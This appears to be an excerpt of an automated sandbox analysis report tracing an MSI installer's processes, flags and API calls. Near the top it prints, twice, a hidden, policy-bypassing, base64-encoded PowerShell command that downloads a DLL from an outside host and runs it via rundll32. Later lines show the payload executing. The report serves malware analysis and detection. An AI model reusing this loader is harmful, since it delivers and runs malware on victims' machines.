Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA== | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer | |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer | |
Source: unknown | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 | |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 | |
Source: unknown | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 | |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 | |
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 98DB8D4E6DAAAA17E94E76B65ACF188B | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI5344.tmp "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA== | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer | Jump to behavior |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer | Jump to behavior |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 | Jump to behavior |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 | |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Process information set: NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A09C20 RegQueryValueExA,GetModuleFileNameW,lstrcpyW,lstrlenW,lstrlenW,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,GetEnvironmentVariableW,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,GetCurrentProcessId,GetCurrentProcessId,ProcessIdToSessionId,GetTickCount,GetModuleHandleA,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetProcessWindowStation,GetUserObjectInformationW,GetUserObjectInformationW,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationW,GetUserNameW,GetComputerNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Process32FirstW,Process32NextW,lstrcpynW,CloseHandle,WTSGetActiveConsoleSessionId,lstrcpyA,CreateDCA,CreateDCA,GetDeviceCaps,GetDeviceCaps,GetDesktopWindow,GetDesktopWindow,MonitorFromWindow,MonitorFromWindow,GetDesktopWindow,MonitorFromWindow,LoadLibraryA, | 7_2_04A09C20 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A07390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose, | 7_2_04A07390 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A07750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose, | 7_2_04A07750 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A03AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose, | 7_2_04A03AA0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A03D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose, | 7_2_04A03D50 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FC7750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose, | 9_2_00FC7750 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FC3AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose, | 9_2_00FC3AA0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FC7390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose, | 9_2_00FC7390 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FC3D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose, | 9_2_00FC3D50 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A09C20 RegQueryValueExA,GetModuleFileNameW,lstrcpyW,lstrlenW,lstrlenW,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,GetEnvironmentVariableW,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,GetCurrentProcessId,GetCurrentProcessId,ProcessIdToSessionId,GetTickCount,GetModuleHandleA,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetProcessWindowStation,GetUserObjectInformationW,GetUserObjectInformationW,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationW,GetUserNameW,GetComputerNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Process32FirstW,Process32NextW,lstrcpynW,CloseHandle,WTSGetActiveConsoleSessionId,lstrcpyA,CreateDCA,CreateDCA,GetDeviceCaps,GetDeviceCaps,GetDesktopWindow,GetDesktopWindow,MonitorFromWindow,MonitorFromWindow,GetDesktopWindow,MonitorFromWindow,LoadLibraryA, | 7_2_04A09C20 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF7090A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 3_2_00007FF7AF7090A4 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF70F3F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_00007FF7AF70F3F4 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A03660 GetComputerNameA,lstrcmpiA,lstrcmpiA,GetUserNameA,lstrcmpiA,SetErrorMode,SetUnhandledExceptionFilter,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,CharLowerA,lstrcpyA,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,GetEnvironmentVariableA,SetEnvironmentVariableA,wsprintfA,OpenFileMappingA,CreateFileMappingA,MapViewOfFile,OpenProcess,TerminateProcess,Sleep,CloseHandle,GetCurrentProcessId,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,inet_addr,CreateThread,WaitForSingleObject,ExitThread, | 7_2_04A03660 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FC3660 GetComputerNameA,lstrcmpiA,lstrcmpiA,GetUserNameA,lstrcmpiA,SetErrorMode,SetUnhandledExceptionFilter,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,CharLowerA,lstrcpyA,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,GetEnvironmentVariableA,SetEnvironmentVariableA,wsprintfA,OpenFileMappingA,CreateFileMappingA,MapViewOfFile,OpenProcess,TerminateProcess,Sleep,CloseHandle,GetCurrentProcessId,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,inet_addr,CreateThread,WaitForSingleObject,ExitThread, | 9_2_00FC3660 |
Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
